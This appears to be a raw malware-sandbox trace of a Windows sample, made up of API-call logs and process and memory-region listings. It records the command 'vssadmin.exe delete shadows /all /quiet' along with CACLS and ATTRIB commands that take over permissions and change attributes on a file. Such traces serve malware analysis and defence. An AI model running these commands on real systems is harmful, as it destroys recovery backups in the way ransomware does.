[0190.906] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0190.906] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0190.906] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0190.906] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0190.906] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0190.906] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0190.906] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0190.906] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0190.906] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0190.906] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0190.906] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0190.906] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0190.906] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0190.906] _wcsicmp 
(_String1="vssadmin", _String2="COLOR") returned 19 [0190.906] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0190.906] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0190.906] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0190.906] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0190.907] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0190.907] SetErrorMode (uMode=0x0) returned 0x0 [0190.907] SetErrorMode (uMode=0x1) returned 0x0 [0190.907] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x471c08, lpFilePart=0x26f258 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f258*="Desktop") returned 0x18 [0190.907] SetErrorMode (uMode=0x0) returned 0x1 [0190.907] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0190.907] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0190.912] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0190.912] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x26eff4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eff4) returned 0xffffffff [0190.913] GetLastError () returned 0x2 [0190.913] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\vssadmin.exe.*", fInfoLevelId=0x1, lpFindFileData=0x26efd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26efd4) returned 0xffffffff [0190.913] GetLastError () returned 0x2 [0190.913] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x26efd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | 
out: lpFindFileData=0x26efd4) returned 0xffffffff [0190.913] GetLastError () returned 0x2 [0190.913] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x26eff4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eff4) returned 0x470898 [0190.913] FindClose (in: hFindFile=0x470898 | out: hFindFile=0x470898) returned 1 [0190.913] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0190.913] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0190.913] GetConsoleTitleW (in: lpConsoleTitle=0x26f4cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.913] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f354, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f41c | out: lpAttributeList=0x26f354, lpSize=0x26f41c) returned 1 [0190.913] UpdateProcThreadAttribute (in: lpAttributeList=0x26f354, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f414, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f354, lpPreviousValue=0x0) returned 1 [0190.913] GetStartupInfoW (in: lpStartupInfo=0x26f310 | out: lpStartupInfo=0x26f310*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="cmd.exe /C vssadmin.exe delete shadows /all /quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0190.913] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0190.914] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin.exe delete shadows /all /quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26f3b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", 
lpTitle="vssadmin.exe delete shadows /all /quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f3fc | out: lpCommandLine="vssadmin.exe delete shadows /all /quiet ", lpProcessInformation=0x26f3fc*(hProcess=0x50, hThread=0x4c, dwProcessId=0x9b4, dwThreadId=0x290)) returned 1 [0190.916] CloseHandle (hObject=0x4c) returned 1 [0190.916] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0190.917] GetEnvironmentStringsW () returned 0x4708f8* [0190.917] FreeEnvironmentStringsW (penv=0x4708f8) returned 1 [0190.917] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0193.896] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26f2f0 | out: lpExitCode=0x26f2f0*=0x2) returned 1 [0193.896] CloseHandle (hObject=0x50) returned 1 [0193.896] _vsnwprintf (in: _Buffer=0x26f438, _BufferCount=0x13, _Format="%08X", _ArgList=0x26f2fc | out: _Buffer="00000002") returned 8 [0193.896] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0193.896] GetEnvironmentStringsW () returned 0x4708f8* [0193.896] FreeEnvironmentStringsW (penv=0x4708f8) returned 1 [0193.896] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0193.896] GetEnvironmentStringsW () returned 0x4708f8* [0193.896] FreeEnvironmentStringsW (penv=0x4708f8) returned 1 [0193.896] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f354 | out: lpAttributeList=0x26f354) [0193.896] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.896] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0193.896] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.896] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0193.897] _get_osfhandle (_FileHandle=0) returned 0x3 [0193.897] GetConsoleMode (in: 
hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0193.897] SetConsoleInputExeNameW () returned 0x1 [0193.897] GetConsoleOutputCP () returned 0x1b5 [0193.897] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0193.897] SetThreadUILanguage (LangId=0x0) returned 0x409 [0193.897] exit (_Code=2) Process: id = "423" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x7ea16ca0" os_pid = "0x9b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "422" os_parent_pid = "0x890" cmd_line = "vssadmin.exe delete shadows /all /quiet " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27920 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27921 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27922 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27923 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 27924 start_va = 0x960000 end_va = 0x97efff entry_point = 0x960000 region_type = mapped_file name = "vssadmin.exe" filename = "\\Windows\\System32\\vssadmin.exe" (normalized: "c:\\windows\\system32\\vssadmin.exe") Region: id = 27925 start_va = 
0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27926 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27927 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27928 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 27929 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27930 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27931 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27932 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27933 start_va = 0x1a0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 27934 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 27935 start_va = 0x70370000 end_va = 0x7037ffff entry_point = 0x70370000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 27936 start_va = 0x70380000 
end_va = 0x70495fff entry_point = 0x70380000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 27937 start_va = 0x738a0000 end_va = 0x738b3fff entry_point = 0x738a0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 27938 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27939 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27940 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27941 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 27942 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27943 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27944 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: 
"c:\\windows\\system32\\msvcrt.dll") Region: id = 27945 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27946 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 27947 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27948 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27949 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27950 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27951 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 27952 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27953 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 27954 start_va = 0x190000 end_va = 0x196fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 27955 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 27956 start_va = 0x1c0000 end_va = 0x1ccfff entry_point = 0x1c0000 region_type = mapped_file name = "vssadmin.exe.mui" filename = "\\Windows\\System32\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\vssadmin.exe.mui") Region: id = 27957 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 27958 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 27959 start_va = 0x250000 end_va = 0x350fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 27960 start_va = 0x980000 end_va = 0x157ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 27961 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 27984 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 27985 start_va = 0x650000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 27986 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 27987 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = 
"private_0x000000007ffde000" filename = "" Region: id = 27988 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 27989 start_va = 0x4b0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 27990 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 27991 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 27992 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 27993 start_va = 0x690000 end_va = 0x95efff entry_point = 0x690000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 27994 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Thread: id = 600 os_tid = 0x290 Thread: id = 603 os_tid = 0xa8c Thread: id = 605 os_tid = 0xa58 Thread: id = 606 os_tid = 0x914 Thread: id = 607 os_tid = 0xe40 Process: id = "424" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16c40" os_pid = "0xab0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "421" os_parent_pid = "0x9d4" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\" 
/E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27962 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27963 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 27964 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 27965 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 27966 start_va = 0xc30000 end_va = 0xc38fff entry_point = 0xc30000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 27967 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27968 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27969 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27970 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 
0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 27971 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27972 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27973 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27974 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27975 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 27976 start_va = 0x4b0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 27977 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27978 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27979 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27980 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27981 
start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27982 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27983 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 601 os_tid = 0x858 Thread: id = 602 os_tid = 0xa7c Process: id = "425" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea167e0" os_pid = "0x98c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "421" os_parent_pid = "0x9d4" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27995 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27996 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27997 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27998 start_va = 0xd0000 
end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 27999 start_va = 0x660000 end_va = 0x666fff entry_point = 0x660000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 28000 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28001 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28002 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28003 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 28004 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28005 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28006 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28007 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28008 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 28009 start_va = 0x230000 end_va = 0x32ffff 
entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 28010 start_va = 0x6dea0000 end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 28011 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28012 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28013 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28014 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28015 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28016 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28017 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28018 start_va = 0x76d70000 end_va = 